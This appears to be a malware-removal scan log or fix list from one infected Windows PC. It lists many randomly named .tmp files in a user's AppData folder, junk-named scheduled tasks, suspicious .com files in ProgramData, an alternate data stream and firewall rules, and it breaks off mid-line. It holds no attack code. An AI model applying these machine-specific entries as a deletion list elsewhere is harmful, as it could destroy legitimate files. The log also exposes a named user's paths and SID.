C:\WINDOWS\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\HostExtensions\PinJSAPI [not found] 2022-03-23 08:26 - 2022-03-23 07:55 - 000069632 _____ C:\Users\Karin Hostetler\AppData\Roaming\myciaB..tmp 2022-03-23 08:26 - 2022-03-17 08:21 - 000057344 _____ C:\Users\Karin Hostetler\AppData\Roaming\B.mvKwd.tmp 2022-03-23 07:04 - 2022-03-23 05:07 - 000069632 _____ C:\Users\Karin Hostetler\AppData\Roaming\Fkhvfuv.tmp 2022-03-23 07:04 - 2022-03-17 08:21 - 000057344 _____ C:\Users\Karin Hostetler\AppData\Roaming\IlxrjIs.tmp 2022-03-23 05:42 - 2022-03-23 05:07 - 000069632 _____ C:\Users\Karin Hostetler\AppData\Roaming\.EipzDA.tmp 2022-03-23 05:42 - 2022-03-17 08:21 - 000057344 _____ C:\Users\Karin Hostetler\AppData\Roaming\FooEDIz.tmp 2022-03-23 04:55 - 2022-03-23 01:07 - 000069632 _____ C:\Users\Karin Hostetler\AppData\Roaming\ianksBp.tmp 2022-03-23 04:55 - 2022-03-17 08:21 - 000057344 _____ C:\Users\Karin Hostetler\AppData\Roaming\ljesr.e.tmp 2022-03-23 02:58 - 2022-03-23 01:07 - 000069632 _____ C:\Users\Karin Hostetler\AppData\Roaming\pAsnGil.tmp 2022-03-23 02:58 - 2022-03-17 08:21 - 000057344 _____ C:\Users\Karin Hostetler\AppData\Roaming\bvcozKc.tmp 2022-03-23 01:36 - 2022-03-23 01:07 - 000069632 _____ C:\Users\Karin Hostetler\AppData\Roaming\vacfsmG.tmp 2022-03-23 01:36 - 2022-03-17 08:21 - 000057344 _____ C:\Users\Karin Hostetler\AppData\Roaming\gelfCgB.tmp 2022-03-23 00:14 - 2022-03-22 21:07 - 000069632 _____ C:\Users\Karin Hostetler\AppData\Roaming\.DmrCyx.tmp 2022-03-23 00:14 - 2022-03-17 08:21 - 000057344 _____ C:\Users\Karin Hostetler\AppData\Roaming\uhhsnBd.tmp 2022-03-22 22:52 - 2022-03-22 21:07 - 000069632 _____ C:\Users\Karin Hostetler\AppData\Roaming\hdpl.A..tmp 2022-03-22 22:52 - 2022-03-17 08:21 - 000057344 _____ C:\Users\Karin Hostetler\AppData\Roaming\fhIqKrG.tmp 2022-03-22 21:30 - 2022-03-22 21:07 - 000069632 _____ C:\Users\Karin Hostetler\AppData\Roaming\h.dA..r.tmp 2022-03-22 21:30 - 2022-03-17 08:21 - 000057344 _____ C:\Users\Karin Hostetler\AppData\Roaming\pF.Fltn.tmp 2022-03-22 20:08 - 2022-03-22 19:54 - 000069632 _____ C:\Users\Karin Hostetler\AppData\Roaming\jKsc.Db.tmp 2022-03-22 20:08 - 2022-03-17 08:21 - 000057344 _____ C:\Users\Karin Hostetler\AppData\Roaming\ymybaBG.tmp 2022-03-22 20:05 - 2022-03-22 19:54 - 000069632 _____ C:\Users\Karin Hostetler\AppData\Roaming\abF.FyJ.tmp 2022-03-22 20:05 - 2022-03-17 08:21 - 000057344 _____ C:\Users\Karin Hostetler\AppData\Roaming\AfKprbo.tmp 2022-03-22 18:46 - 2022-03-22 17:07 - 000069632 _____ C:\Users\Karin Hostetler\AppData\Roaming\.gq.eEv.tmp 2022-03-22 18:46 - 2022-03-17 08:21 - 000057344 _____ C:\Users\Karin Hostetler\AppData\Roaming\Kjvon.z.tmp 2022-03-22 18:20 - 2022-03-22 17:07 - 000069632 _____ C:\Users\Karin Hostetler\AppData\Roaming\hc.Ekso.tmp 2022-03-22 18:20 - 2022-03-17 08:21 - 000057344 _____ C:\Users\Karin Hostetler\AppData\Roaming\zmabqBm.tmp 2022-03-22 17:24 - 2022-03-22 17:07 - 000069632 _____ C:\Users\Karin Hostetler\AppData\Roaming\pddmtsw.tmp 2022-03-22 17:24 - 2022-03-17 08:21 - 000057344 _____ C:\Users\Karin Hostetler\AppData\Roaming\flwKCyx.tmp 2022-03-22 16:19 - 2022-03-23 08:05 - 000003754 _____ C:\WINDOWS\system32\Tasks\asdsdasdjikindasddeyu 2022-03-22 16:02 - 2022-03-22 15:31 - 000069632 _____ C:\Users\Karin Hostetler\AppData\Roaming\GK.xB.H.tmp 2022-03-22 16:02 - 2022-03-17 08:21 - 000057344 _____ C:\Users\Karin Hostetler\AppData\Roaming\hHKvy.s.tmp 2022-03-22 14:53 - 2022-03-22 14:53 - 000003770 _____ C:\WINDOWS\system32\Tasks\asdaddddasdadsddasdeyu 2022-03-22 14:53 - 2020-10-14 07:54 - 000452608 _____ (Microsoft Corporation) C:\ProgramData\timagar.com 2022-03-22 14:12 - 2022-03-22 13:07 - 000069632 _____ C:\Users\Karin Hostetler\AppData\Roaming\xbfAl.r.tmp 2022-03-22 14:12 - 2022-03-17 08:21 - 000057344 _____ C:\Users\Karin Hostetler\AppData\Roaming\DgkIlaH.tmp 2022-03-22 13:44 - 2022-03-22 13:07 - 000069632 _____ C:\Users\Karin Hostetler\AppData\Roaming\rGjizBd.tmp 2022-03-22 13:44 - 2022-03-17 08:21 - 000057344 _____ C:\Users\Karin Hostetler\AppData\Roaming\kawiKkt.tmp 2022-03-22 13:18 - 2022-03-22 13:07 - 000069632 _____ C:\Users\Karin Hostetler\AppData\Roaming\KAJdHsx.tmp 2022-03-22 13:18 - 2022-03-17 08:21 - 000057344 _____ C:\Users\Karin Hostetler\AppData\Roaming\kaampdk.tmp 2022-03-22 13:12 - 2022-03-22 13:07 - 000069632 _____ C:\Users\Karin Hostetler\AppData\Roaming\c.pmfr..tmp 2022-03-22 13:12 - 2022-03-17 08:21 - 000057344 _____ C:\Users\Karin Hostetler\AppData\Roaming\FkyDzBg.tmp 2022-03-22 11:35 - 2022-03-17 08:21 - 000057344 _____ C:\Users\Karin Hostetler\AppData\Roaming\.yvbevo.tmp 2022-03-22 11:35 - 2022-03-11 20:38 - 000049152 _____ C:\Users\Karin Hostetler\AppData\Roaming\CqicpoE.tmp 2022-03-22 11:11 - 2022-03-17 08:21 - 000057344 _____ C:\Users\Karin Hostetler\AppData\Roaming\imec.rK.tmp 2022-03-22 11:11 - 2022-03-11 20:38 - 000049152 _____ C:\Users\Karin Hostetler\AppData\Roaming\.wB.u.k.tmp 2022-03-22 10:40 - 2022-03-22 10:40 - 000000000 ____D C:\Users\Karin Hostetler\AppData\Local\mbam 2022-03-22 10:34 - 2022-03-17 08:21 - 000057344 _____ C:\Users\Karin Hostetler\AppData\Roaming\x.fkmhm.tmp 2022-03-22 10:34 - 2022-03-11 20:38 - 000049152 _____ C:\Users\Karin Hostetler\AppData\Roaming\.AInoHs.tmp 2022-03-22 09:12 - 2022-03-17 08:21 - 000057344 _____ C:\Users\Karin Hostetler\AppData\Roaming\hHpH.vg.tmp 2022-03-22 09:12 - 2022-03-11 20:38 - 000049152 _____ C:\Users\Karin Hostetler\AppData\Roaming\.Fixosu.tmp 2022-03-22 07:50 - 2022-03-17 08:21 - 000057344 _____ C:\Users\Karin Hostetler\AppData\Roaming\As.e.Iq.tmp 2022-03-22 07:50 - 2022-03-11 20:38 - 000049152 _____ C:\Users\Karin Hostetler\AppData\Roaming\u.vBKhg.tmp 2022-03-22 06:28 - 2022-03-17 08:21 - 000057344 _____ C:\Users\Karin Hostetler\AppData\Roaming\FHm.CCw.tmp 2022-03-22 06:28 - 2022-03-11 20:38 - 000049152 _____ C:\Users\Karin Hostetler\AppData\Roaming\G.zIGwn.tmp 2022-03-22 05:50 - 2022-03-17 08:21 - 000057344 _____ C:\Users\Karin Hostetler\AppData\Roaming\uebnfhx.tmp 2022-03-22 05:50 - 2022-03-11 20:38 - 000049152 _____ C:\Users\Karin Hostetler\AppData\Roaming\FqFql.I.tmp 2022-03-22 05:30 - 2022-03-17 08:21 - 000057344 _____ C:\Users\Karin Hostetler\AppData\Roaming\vowws.H.tmp 2022-03-22 05:30 - 2022-03-11 20:38 - 000049152 _____ C:\Users\Karin Hostetler\AppData\Roaming\.BahC.h.tmp 2022-03-22 05:06 - 2022-03-17 08:21 - 000057344 _____ C:\Users\Karin Hostetler\AppData\Roaming\zBllBya.tmp 2022-03-22 05:06 - 2022-03-11 20:38 - 000049152 _____ C:\Users\Karin Hostetler\AppData\Roaming\qcmJyrv.tmp 2022-03-22 04:04 - 2022-03-17 08:21 - 000057344 _____ C:\Users\Karin Hostetler\AppData\Roaming\BcvEhIh.tmp 2022-03-22 04:04 - 2022-03-11 20:38 - 000049152 _____ C:\Users\Karin Hostetler\AppData\Roaming\hKKAJt..tmp 2022-03-22 03:51 - 2022-03-17 08:21 - 000057344 _____ C:\Users\Karin Hostetler\AppData\Roaming\H.FnrcA.tmp 2022-03-22 03:51 - 2022-03-11 20:38 - 000049152 _____ C:\Users\Karin Hostetler\AppData\Roaming\FcfgK.l.tmp 2022-03-22 03:44 - 2022-03-17 08:21 - 000057344 _____ C:\Users\Karin Hostetler\AppData\Roaming\JBAeesf.tmp 2022-03-22 03:44 - 2022-03-11 20:38 - 000049152 _____ C:\Users\Karin Hostetler\AppData\Roaming\.yvkw.y.tmp 2022-03-22 03:05 - 2022-03-17 08:21 - 000057344 _____ C:\Users\Karin Hostetler\AppData\Roaming\GyhgfDG.tmp 2022-03-22 03:05 - 2022-03-11 20:38 - 000049152 _____ C:\Users\Karin Hostetler\AppData\Roaming\rGHtFCn.tmp 2022-03-22 03:00 - 2022-03-17 08:21 - 000057344 _____ C:\Users\Karin Hostetler\AppData\Roaming\pzvEJ.c.tmp 2022-03-22 03:00 - 2022-03-11 20:38 - 000049152 _____ C:\Users\Karin Hostetler\AppData\Roaming\cxuionk.tmp 2022-03-22 02:22 - 2022-03-17 08:21 - 000057344 _____ C:\Users\Karin Hostetler\AppData\Roaming\zatwfvJ.tmp 2022-03-22 02:22 - 2022-03-11 20:38 - 000049152 _____ C:\Users\Karin Hostetler\AppData\Roaming\KaAzBzg.tmp 2022-03-22 01:46 - 2022-03-17 08:21 - 000057344 _____ C:\Users\Karin Hostetler\AppData\Roaming\zIBKqww.tmp 2022-03-22 01:46 - 2022-03-11 20:38 - 000049152 _____ C:\Users\Karin Hostetler\AppData\Roaming\EAyEynk.tmp 2022-03-22 01:00 - 2022-03-17 08:21 - 000057344 _____ C:\Users\Karin Hostetler\AppData\Roaming\BvqpwdK.tmp 2022-03-22 01:00 - 2022-03-11 20:38 - 000049152 _____ C:\Users\Karin Hostetler\AppData\Roaming\yc.Kam..tmp 2022-03-21 23:38 - 2022-03-17 08:21 - 000057344 _____ C:\Users\Karin Hostetler\AppData\Roaming\cbmkybA.tmp 2022-03-21 23:38 - 2022-03-11 20:38 - 000049152 _____ C:\Users\Karin Hostetler\AppData\Roaming\Io..gvn.tmp 2022-03-21 22:16 - 2022-03-17 08:21 - 000057344 _____ C:\Users\Karin Hostetler\AppData\Roaming\CrKgBBd.tmp 2022-03-21 22:16 - 2022-03-11 20:38 - 000049152 _____ C:\Users\Karin Hostetler\AppData\Roaming\tgIysyi.tmp 2022-03-21 20:54 - 2022-03-17 08:21 - 000057344 _____ C:\Users\Karin Hostetler\AppData\Roaming\EDhbFIz.tmp 2022-03-21 20:54 - 2022-03-11 20:38 - 000049152 _____ C:\Users\Karin Hostetler\AppData\Roaming\nGtAkFz.tmp 2022-03-21 20:37 - 2022-03-17 08:21 - 000057344 _____ C:\Users\Karin Hostetler\AppData\Roaming\vCkilCq.tmp 2022-03-21 20:37 - 2022-03-11 20:38 - 000049152 _____ C:\Users\Karin Hostetler\AppData\Roaming\EaBiAea.tmp 2022-03-21 19:32 - 2022-03-17 08:21 - 000057344 _____ C:\Users\Karin Hostetler\AppData\Roaming\CisKbHh.tmp 2022-03-21 19:32 - 2022-03-11 20:38 - 000049152 _____ C:\Users\Karin Hostetler\AppData\Roaming\.r.ubyg.tmp 2022-03-21 18:35 - 2022-03-17 08:21 - 000057344 _____ C:\Users\Karin Hostetler\AppData\Roaming\migEyFu.tmp 2022-03-21 18:35 - 2022-03-11 20:38 - 000049152 _____ C:\Users\Karin Hostetler\AppData\Roaming\.tyCkte.tmp 2022-03-21 18:32 - 2022-03-17 08:21 - 000057344 _____ C:\Users\Karin Hostetler\AppData\Roaming\EygEhJE.tmp 2022-03-21 18:32 - 2022-03-11 20:38 - 000049152 _____ C:\Users\Karin Hostetler\AppData\Roaming\Ja.AJly.tmp 2022-03-21 18:10 - 2022-03-17 08:21 - 000057344 _____ C:\Users\Karin Hostetler\AppData\Roaming\hgJmzHc.tmp 2022-03-21 18:10 - 2022-03-11 20:38 - 000049152 _____ C:\Users\Karin Hostetler\AppData\Roaming\lfjDy.A.tmp 2022-03-21 18:05 - 2022-03-17 08:21 - 000057344 _____ C:\Users\Karin Hostetler\AppData\Roaming\bwyFtJD.tmp 2022-03-21 18:05 - 2022-03-11 20:38 - 000049152 _____ C:\Users\Karin Hostetler\AppData\Roaming\d.KvBEk.tmp 2022-03-21 17:13 - 2022-03-17 08:21 - 000057344 _____ C:\Users\Karin Hostetler\AppData\Roaming\hGmrugl.tmp 2022-03-21 17:13 - 2022-03-17 08:21 - 000057344 _____ C:\Users\Karin Hostetler\AppData\Roaming\CFCbraa.tmp 2022-03-21 17:13 - 2022-03-11 20:38 - 000049152 _____ C:\Users\Karin Hostetler\AppData\Roaming\swhi.Fm.tmp 2022-03-21 17:13 - 2022-03-11 20:38 - 000049152 _____ C:\Users\Karin Hostetler\AppData\Roaming\GuyFxhj.tmp 2022-03-21 16:52 - 2022-03-17 08:21 - 000057344 _____ C:\Users\Karin Hostetler\AppData\Roaming\zkKIqmK.tmp 2022-03-21 16:52 - 2022-03-11 20:38 - 000049152 _____ C:\Users\Karin Hostetler\AppData\Roaming\oCGeaDq.tmp 2022-03-21 16:48 - 2022-03-17 08:21 - 000057344 _____ C:\Users\Karin Hostetler\AppData\Roaming\iewoixB.tmp 2022-03-21 16:48 - 2022-03-11 20:38 - 000049152 _____ C:\Users\Karin Hostetler\AppData\Roaming\IvocJvb.tmp 2022-03-21 16:47 - 2022-03-23 08:25 - 000003730 _____ C:\WINDOWS\system32\Tasks\microWord 2022-03-21 15:25 - 2022-03-21 15:25 - 000003768 _____ C:\WINDOWS\system32\Tasks\calendersw 2022-03-21 15:25 - 2020-10-14 07:54 - 000433152 _____ (Microsoft Corporation) C:\ProgramData\ESETNONU.com 2022-03-21 15:25 - 2019-12-07 05:10 - 000013312 _____ (Microsoft Corporation) C:\ProgramData\milon.com 2022-03-21 15:24 - 2019-12-07 05:10 - 000013312 _____ (Microsoft Corporation) C:\ProgramData\ddond.com 2022-03-22 10:34 - 2022-03-11 20:38 - 000049152 _____ () C:\Users\Karin Hostetler\AppData\Roaming\.AInoHs.tmp 2022-03-22 05:30 - 2022-03-11 20:38 - 000049152 _____ () C:\Users\Karin Hostetler\AppData\Roaming\.BahC.h.tmp 2022-03-23 00:14 - 2022-03-22 21:07 - 000069632 _____ () C:\Users\Karin Hostetler\AppData\Roaming\.DmrCyx.tmp 2022-03-23 05:42 - 2022-03-23 05:07 - 000069632 _____ () C:\Users\Karin Hostetler\AppData\Roaming\.EipzDA.tmp 2022-03-22 09:12 - 2022-03-11 20:38 - 000049152 _____ () C:\Users\Karin Hostetler\AppData\Roaming\.Fixosu.tmp 2022-03-22 18:46 - 2022-03-22 17:07 - 000069632 _____ () C:\Users\Karin Hostetler\AppData\Roaming\.gq.eEv.tmp 2022-03-21 19:32 - 2022-03-11 20:38 - 000049152 _____ () C:\Users\Karin Hostetler\AppData\Roaming\.r.ubyg.tmp 2022-03-21 18:35 - 2022-03-11 20:38 - 000049152 _____ () C:\Users\Karin Hostetler\AppData\Roaming\.tyCkte.tmp 2022-03-22 11:11 - 2022-03-11 20:38 - 000049152 _____ () C:\Users\Karin Hostetler\AppData\Roaming\.wB.u.k.tmp 2022-03-22 11:35 - 2022-03-17 08:21 - 000057344 _____ () C:\Users\Karin Hostetler\AppData\Roaming\.yvbevo.tmp 2022-03-22 03:44 - 2022-03-11 20:38 - 000049152 _____ () C:\Users\Karin Hostetler\AppData\Roaming\.yvkw.y.tmp 2022-03-22 20:05 - 2022-03-22 19:54 - 000069632 _____ () C:\Users\Karin Hostetler\AppData\Roaming\abF.FyJ.tmp 2022-03-22 20:05 - 2022-03-17 08:21 - 000057344 _____ () C:\Users\Karin Hostetler\AppData\Roaming\AfKprbo.tmp 2022-03-22 07:50 - 2022-03-17 08:21 - 000057344 _____ () C:\Users\Karin Hostetler\AppData\Roaming\As.e.Iq.tmp 2022-03-23 08:26 - 2022-03-17 08:21 - 000057344 _____ () C:\Users\Karin Hostetler\AppData\Roaming\B.mvKwd.tmp 2022-03-22 04:04 - 2022-03-17 08:21 - 000057344 _____ () C:\Users\Karin Hostetler\AppData\Roaming\BcvEhIh.tmp 2022-03-23 02:58 - 2022-03-17 08:21 - 000057344 _____ () C:\Users\Karin Hostetler\AppData\Roaming\bvcozKc.tmp 2022-03-22 01:00 - 2022-03-17 08:21 - 000057344 _____ () C:\Users\Karin Hostetler\AppData\Roaming\BvqpwdK.tmp 2022-03-21 18:05 - 2022-03-17 08:21 - 000057344 _____ () C:\Users\Karin Hostetler\AppData\Roaming\bwyFtJD.tmp 2022-03-22 13:12 - 2022-03-22 13:07 - 000069632 _____ () C:\Users\Karin Hostetler\AppData\Roaming\c.pmfr..tmp 2022-03-21 23:38 - 2022-03-17 08:21 - 000057344 _____ () C:\Users\Karin Hostetler\AppData\Roaming\cbmkybA.tmp 2022-03-21 17:13 - 2022-03-17 08:21 - 000057344 _____ () C:\Users\Karin Hostetler\AppData\Roaming\CFCbraa.tmp 2022-03-21 19:32 - 2022-03-17 08:21 - 000057344 _____ () C:\Users\Karin Hostetler\AppData\Roaming\CisKbHh.tmp 2022-03-22 11:35 - 2022-03-11 20:38 - 000049152 _____ () C:\Users\Karin Hostetler\AppData\Roaming\CqicpoE.tmp 2022-03-21 22:16 - 2022-03-17 08:21 - 000057344 _____ () C:\Users\Karin Hostetler\AppData\Roaming\CrKgBBd.tmp 2022-03-22 03:00 - 2022-03-11 20:38 - 000049152 _____ () C:\Users\Karin Hostetler\AppData\Roaming\cxuionk.tmp 2022-03-21 18:05 - 2022-03-11 20:38 - 000049152 _____ () C:\Users\Karin Hostetler\AppData\Roaming\d.KvBEk.tmp 2022-03-22 14:12 - 2022-03-17 08:21 - 000057344 _____ () C:\Users\Karin Hostetler\AppData\Roaming\DgkIlaH.tmp 2022-03-21 20:37 - 2022-03-11 20:38 - 000049152 _____ () C:\Users\Karin Hostetler\AppData\Roaming\EaBiAea.tmp 2022-03-22 01:46 - 2022-03-11 20:38 - 000049152 _____ () C:\Users\Karin Hostetler\AppData\Roaming\EAyEynk.tmp 2022-03-21 20:54 - 2022-03-17 08:21 - 000057344 _____ () C:\Users\Karin Hostetler\AppData\Roaming\EDhbFIz.tmp 2022-03-21 18:32 - 2022-03-17 08:21 - 000057344 _____ () C:\Users\Karin Hostetler\AppData\Roaming\EygEhJE.tmp 2022-03-22 03:51 - 2022-03-11 20:38 - 000049152 _____ () C:\Users\Karin Hostetler\AppData\Roaming\FcfgK.l.tmp 2022-03-22 22:52 - 2022-03-17 08:21 - 000057344 _____ () C:\Users\Karin Hostetler\AppData\Roaming\fhIqKrG.tmp 2022-03-22 06:28 - 2022-03-17 08:21 - 000057344 _____ () C:\Users\Karin Hostetler\AppData\Roaming\FHm.CCw.tmp 2022-03-23 07:04 - 2022-03-23 05:07 - 000069632 _____ () C:\Users\Karin Hostetler\AppData\Roaming\Fkhvfuv.tmp 2022-03-22 13:12 - 2022-03-17 08:21 - 000057344 _____ () C:\Users\Karin Hostetler\AppData\Roaming\FkyDzBg.tmp 2022-03-22 17:24 - 2022-03-17 08:21 - 000057344 _____ () C:\Users\Karin Hostetler\AppData\Roaming\flwKCyx.tmp 2022-03-23 05:42 - 2022-03-17 08:21 - 000057344 _____ () C:\Users\Karin Hostetler\AppData\Roaming\FooEDIz.tmp 2022-03-22 05:50 - 2022-03-11 20:38 - 000049152 _____ () C:\Users\Karin Hostetler\AppData\Roaming\FqFql.I.tmp 2022-03-22 06:28 - 2022-03-11 20:38 - 000049152 _____ () C:\Users\Karin Hostetler\AppData\Roaming\G.zIGwn.tmp 2022-03-23 01:36 - 2022-03-17 08:21 - 000057344 _____ () C:\Users\Karin Hostetler\AppData\Roaming\gelfCgB.tmp 2022-03-22 16:02 - 2022-03-22 15:31 - 000069632 _____ () C:\Users\Karin Hostetler\AppData\Roaming\GK.xB.H.tmp 2022-03-21 17:13 - 2022-03-11 20:38 - 000049152 _____ () C:\Users\Karin Hostetler\AppData\Roaming\GuyFxhj.tmp 2022-03-22 03:05 - 2022-03-17 08:21 - 000057344 _____ () C:\Users\Karin Hostetler\AppData\Roaming\GyhgfDG.tmp 2022-03-22 21:30 - 2022-03-22 21:07 - 000069632 _____ () C:\Users\Karin Hostetler\AppData\Roaming\h.dA..r.tmp 2022-03-22 03:51 - 2022-03-17 08:21 - 000057344 _____ () C:\Users\Karin Hostetler\AppData\Roaming\H.FnrcA.tmp 2022-03-22 18:20 - 2022-03-22 17:07 - 000069632 _____ () C:\Users\Karin Hostetler\AppData\Roaming\hc.Ekso.tmp 2022-03-22 22:52 - 2022-03-22 21:07 - 000069632 _____ () C:\Users\Karin Hostetler\AppData\Roaming\hdpl.A..tmp 2022-03-21 18:10 - 2022-03-17 08:21 - 000057344 _____ () C:\Users\Karin Hostetler\AppData\Roaming\hgJmzHc.tmp 2022-03-21 17:13 - 2022-03-17 08:21 - 000057344 _____ () C:\Users\Karin Hostetler\AppData\Roaming\hGmrugl.tmp 2022-03-22 16:02 - 2022-03-17 08:21 - 000057344 _____ () C:\Users\Karin Hostetler\AppData\Roaming\hHKvy.s.tmp 2022-03-22 09:12 - 2022-03-17 08:21 - 000057344 _____ () C:\Users\Karin Hostetler\AppData\Roaming\hHpH.vg.tmp 2022-03-22 04:04 - 2022-03-11 20:38 - 000049152 _____ () C:\Users\Karin Hostetler\AppData\Roaming\hKKAJt..tmp 2022-03-23 04:55 - 2022-03-23 01:07 - 000069632 _____ () C:\Users\Karin Hostetler\AppData\Roaming\ianksBp.tmp 2022-03-21 16:48 - 2022-03-17 08:21 - 000057344 _____ () C:\Users\Karin Hostetler\AppData\Roaming\iewoixB.tmp 2022-03-23 07:04 - 2022-03-17 08:21 - 000057344 _____ () C:\Users\Karin Hostetler\AppData\Roaming\IlxrjIs.tmp 2022-03-22 11:11 - 2022-03-17 08:21 - 000057344 _____ () C:\Users\Karin Hostetler\AppData\Roaming\imec.rK.tmp 2022-03-21 23:38 - 2022-03-11 20:38 - 000049152 _____ () C:\Users\Karin Hostetler\AppData\Roaming\Io..gvn.tmp 2022-03-21 16:48 - 2022-03-11 20:38 - 000049152 _____ () C:\Users\Karin Hostetler\AppData\Roaming\IvocJvb.tmp 2022-03-21 18:32 - 2022-03-11 20:38 - 000049152 _____ () C:\Users\Karin Hostetler\AppData\Roaming\Ja.AJly.tmp 2022-03-22 03:44 - 2022-03-17 08:21 - 000057344 _____ () C:\Users\Karin Hostetler\AppData\Roaming\JBAeesf.tmp 2022-03-22 20:08 - 2022-03-22 19:54 - 000069632 _____ () C:\Users\Karin Hostetler\AppData\Roaming\jKsc.Db.tmp 2022-03-22 13:18 - 2022-03-17 08:21 - 000057344 _____ () C:\Users\Karin Hostetler\AppData\Roaming\kaampdk.tmp 2022-03-22 02:22 - 2022-03-11 20:38 - 000049152 _____ () C:\Users\Karin Hostetler\AppData\Roaming\KaAzBzg.tmp 2022-03-22 13:18 - 2022-03-22 13:07 - 000069632 _____ () C:\Users\Karin Hostetler\AppData\Roaming\KAJdHsx.tmp 2022-03-22 13:44 - 2022-03-17 08:21 - 000057344 _____ () C:\Users\Karin Hostetler\AppData\Roaming\kawiKkt.tmp 2022-03-22 18:46 - 2022-03-17 08:21 - 000057344 _____ () C:\Users\Karin Hostetler\AppData\Roaming\Kjvon.z.tmp 2022-03-21 18:10 - 2022-03-11 20:38 - 000049152 _____ () C:\Users\Karin Hostetler\AppData\Roaming\lfjDy.A.tmp 2022-03-23 04:55 - 2022-03-17 08:21 - 000057344 _____ () C:\Users\Karin Hostetler\AppData\Roaming\ljesr.e.tmp 2022-03-21 18:35 - 2022-03-17 08:21 - 000057344 _____ () C:\Users\Karin Hostetler\AppData\Roaming\migEyFu.tmp 2022-03-23 08:26 - 2022-03-23 07:55 - 000069632 _____ () C:\Users\Karin Hostetler\AppData\Roaming\myciaB..tmp 2022-03-21 20:54 - 2022-03-11 20:38 - 000049152 _____ () C:\Users\Karin Hostetler\AppData\Roaming\nGtAkFz.tmp 2022-03-21 16:52 - 2022-03-11 20:38 - 000049152 _____ () C:\Users\Karin Hostetler\AppData\Roaming\oCGeaDq.tmp 2022-03-23 02:58 - 2022-03-23 01:07 - 000069632 _____ () C:\Users\Karin Hostetler\AppData\Roaming\pAsnGil.tmp 2022-03-22 17:24 - 2022-03-22 17:07 - 000069632 _____ () C:\Users\Karin Hostetler\AppData\Roaming\pddmtsw.tmp 2022-03-22 21:30 - 2022-03-17 08:21 - 000057344 _____ () C:\Users\Karin Hostetler\AppData\Roaming\pF.Fltn.tmp 2022-03-22 03:00 - 2022-03-17 08:21 - 000057344 _____ () C:\Users\Karin Hostetler\AppData\Roaming\pzvEJ.c.tmp 2022-03-22 05:06 - 2022-03-11 20:38 - 000049152 _____ () C:\Users\Karin Hostetler\AppData\Roaming\qcmJyrv.tmp 2022-03-22 03:05 - 2022-03-11 20:38 - 000049152 _____ () C:\Users\Karin Hostetler\AppData\Roaming\rGHtFCn.tmp 2022-03-22 13:44 - 2022-03-22 13:07 - 000069632 _____ () C:\Users\Karin Hostetler\AppData\Roaming\rGjizBd.tmp 2022-03-21 17:13 - 2022-03-11 20:38 - 000049152 _____ () C:\Users\Karin Hostetler\AppData\Roaming\swhi.Fm.tmp 2022-03-21 22:16 - 2022-03-11 20:38 - 000049152 _____ () C:\Users\Karin Hostetler\AppData\Roaming\tgIysyi.tmp 2022-03-22 07:50 - 2022-03-11 20:38 - 000049152 _____ () C:\Users\Karin Hostetler\AppData\Roaming\u.vBKhg.tmp 2022-03-22 05:50 - 2022-03-17 08:21 - 000057344 _____ () C:\Users\Karin Hostetler\AppData\Roaming\uebnfhx.tmp 2022-03-23 00:14 - 2022-03-17 08:21 - 000057344 _____ () C:\Users\Karin Hostetler\AppData\Roaming\uhhsnBd.tmp 2022-03-23 01:36 - 2022-03-23 01:07 - 000069632 _____ () C:\Users\Karin Hostetler\AppData\Roaming\vacfsmG.tmp 2022-03-21 20:37 - 2022-03-17 08:21 - 000057344 _____ () C:\Users\Karin Hostetler\AppData\Roaming\vCkilCq.tmp 2022-03-22 05:30 - 2022-03-17 08:21 - 000057344 _____ () C:\Users\Karin Hostetler\AppData\Roaming\vowws.H.tmp 2022-03-22 10:34 - 2022-03-17 08:21 - 000057344 _____ () C:\Users\Karin Hostetler\AppData\Roaming\x.fkmhm.tmp 2022-03-22 14:12 - 2022-03-22 13:07 - 000069632 _____ () C:\Users\Karin Hostetler\AppData\Roaming\xbfAl.r.tmp 2022-03-22 01:00 - 2022-03-11 20:38 - 000049152 _____ () C:\Users\Karin Hostetler\AppData\Roaming\yc.Kam..tmp 2022-03-22 20:08 - 2022-03-17 08:21 - 000057344 _____ () C:\Users\Karin Hostetler\AppData\Roaming\ymybaBG.tmp 2022-03-22 02:22 - 2022-03-17 08:21 - 000057344 _____ () C:\Users\Karin Hostetler\AppData\Roaming\zatwfvJ.tmp 2022-03-22 05:06 - 2022-03-17 08:21 - 000057344 _____ () C:\Users\Karin Hostetler\AppData\Roaming\zBllBya.tmp 2022-03-22 01:46 - 2022-03-17 08:21 - 000057344 _____ () C:\Users\Karin Hostetler\AppData\Roaming\zIBKqww.tmp 2022-03-21 16:52 - 2022-03-17 08:21 - 000057344 _____ () C:\Users\Karin Hostetler\AppData\Roaming\zkKIqmK.tmp 2022-03-22 18:20 - 2022-03-17 08:21 - 000057344 _____ () C:\Users\Karin Hostetler\AppData\Roaming\zmabqBm.tmp AlternateDataStreams: C:\ProgramData\Temp:AB1A1E3D [742] SearchScopes: HKU\S-1-5-21-1394640484-365018484-2708498470-1001 -> DefaultScope {B18C6A76-7C50-4965-9A1B-B109B920ADCD} URL = SearchScopes: HKU\S-1-5-21-1394640484-365018484-2708498470-1001 -> {B18C6A76-7C50-4965-9A1B-B109B920ADCD} URL = FirewallRules: [UDP Query User{B5A12A77-2103-48C0-B36D-984E39636A68}C:\users\karin hostetler\appdata\local\liscio\app-1.0.1\liscio.exe] => (Allow) C:\users\karin hostetler\appdata\local\liscio\app-1.0.1\liscio.exe => No File FirewallRules: [TCP Query User{C8669CBA-D698-4654-B81A-2B14A9AB72F3}C:\users\karin hostetler\appdata\local\liscio\app-1.0.1\liscio.exe] => (Allow) C:\users\karin hostetler\appdata\local\liscio\app-1.0.1\liscio.exe => No File FirewallRules: [UDP Query User{51C5DD6A-E83B-4BC3-ABFC-716A8DF92697}C:\program files (x86)\mobisynapse\mobisynapsesynchelper.exe] => (Block) C:\program files (x86)\mobisynapse\mobisynapsesynchelper.exe => No File FirewallRules: [TCP Query User{5B3CB77D-7C8D-4426-AF81-98921AC1C5B4}C:\program files (x86)\mobisynapse\mobisynapsesynchelper.exe] => (Block) C:\program files (x86)\mobisynapse\mobisynapsesynchelper.exe => No File FirewallRules: [TCP Query User{05AE48DE-AA5E-4919-80F8-76893F99556E}C:\users\karin hostetler\appdata\local\temp\g2_2324\g2viewer.exe] => (Allow) C:\users\karin hostetler\appdata\local\temp\g2_2324\g2viewer.exe => No File FirewallRules: [UDP Query User{F6FCDB82-142B-409C-BF5F-ADE31A08D795}C:\users\karin hostetler\appdata\local\temp\g2_2324\g2viewer.exe] => (Allow) C:\users\karin 